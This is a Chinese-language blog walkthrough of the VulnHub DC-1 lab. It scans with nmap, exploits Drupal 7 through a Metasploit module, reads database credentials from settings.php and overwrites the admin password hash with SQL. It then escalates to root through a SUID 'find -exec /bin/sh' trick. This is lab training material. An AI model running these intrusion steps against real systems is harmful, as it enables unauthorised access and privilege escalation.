【vulnhub】DC-1

使用 arp-scan -l 看一下局域网中存活的主机

192.168.149.150,用 nmap 扫一下:nmap -A 192.168.149.150

可以看到有个 80 口开着,可以先去看一下是干啥的

一个用 drupal cms 搭建起来的网站,扫一波目录

访问一下 robots.txt,里面有个 UPGRANDE.txt

也就是说他现在版本是 7.x 的

用 msf 搜一下看看有没有现成的:

使用 2018 年的那个可以

设置一下攻击目标:set RHOSTS 192.168.149.150

然后执行 exploit 开始攻击,成功之后直接 ls 就发现了 flag1.txt

cat 一下,看看内容,告诉我们一个好的 cms 需要 config 文件,

去找一下这个 config 文件,Drupal 的默认配置文件路径为

/var/www/sites/default/settings.php

同时找到了 flag2 和 数据库的用户名与密码

但是连接不上

python -c "import pty;pty.spawn('/bin/bash')"

这样开一个交互试试,nice

select * from users;,发现了 admin ,以及他密码的 hash 值

http://drupalchina.cn/node/2128

参考这个方法,把密码给改成 yichen,拿到 hash 后去 mysql 里面替换就可以了

$S$DAowqHa2RDeEsjEuWpJWUE28BF0Hs4QjzoFsMRb8Qvz9Hl87oJKj

update users set pass='$S$DAowqHa2RDeEsjEuWpJWUE28BF0Hs4QjzoFsMRb8Qvz9Hl87oJKj' where name='admin';

这时候再用 用户名:admin 密码:yichen 去登录网站就登陆成功了

在这个地方,发现 flag3,看一下内容

emmm,在 etc/passwd 看到 flag4 这个用户

在 home/flag4 下面放着 flag4.txt

提权:

find / -user root -perm -4000 -print 2>/dev/null

可以发现 find 是用 root 权限运行的

然后:

find ./ -exec "/bin/sh" \;

提权成功

最终,在 root 目录下发现 thefinalflag.txt

本文分享自微信公众号 - 陈冠男的游戏人生(CGN-115),作者:yichen

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-03-31

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Vulnhub分配IP问题 | w4sp-lab环境搭建

    在做 DC-3 靶机的时候,遇到了扫不到 ip 的问题,然后查了一下发现是网卡配置问题

    yichen
  • 逆向一期/010/F12暂停法

    yichen
  • Wireshark:Nmap扫描分析

    如果目标端口开启:首先 kali 向目标发送 [SYN],然后目标返回 [SYN,ACK],kali 再发送 [ACK] 与 [RST,ACK]

    yichen
  • linux下搜索find命令详解

    最近我们团队开展了一系列的15分钟linux培训计划,今天给大家分享了下find命令的使用,不过内容有点少了。这里把能用到的命令都列一下,也方便以后查找使用。...

    the5fire
  • 记忆插画师-脑中的FPGA电路

    经过大约半个月的思考和查阅资料,准备还是将这部分教程写出来,这个思路的来源主要是好多人留言,入门之后感觉还是很迷茫。其实这个问题,我也很难去解答,但是我还是希望...

    碎碎思
  • Android 必知必会 - 隐藏烦人的 JAVA 图标

    当你在项目中运行 ./gradlew 是,有时需要调用一些 JAVA 工具。在 OS X 上,这会伴随着 Java 图标在 Docker 上的显示,并且永远不...

    他叫自己MR.张
  • Linux命令(31)——find命令

    find命令用于在指定目录查找文件,可以指定一些匹配条件,如按文件名、文件类型、用户甚至是时间戳来查找文件。

    Dabelv
  • 浅谈HTTP隐蔽隧道下的RDP暴力破解测试

    HTTP隧道用于在受限网络连接的条件下在两台计算机之间创建网络链接,用于绕过IDS、Firewall一类的安全设备限制实现基于HTTP协议的通信,常常用于内网里...

    FB客服
  • 颜学伟:实时音视频与PSTN结合的解决办法

    6月29日,音视频及融合通信技术技术沙龙圆满落幕。本期沙龙特邀请腾讯云技术专家分享关于最新的低延迟技术、全新的商业直播方案等话题,针对腾讯云音视频及融合通信产品...

    云加社区技术沙龙
  • SpringBoot_04_热部署

    shirayner

扫码关注云+社区

领取腾讯云代金券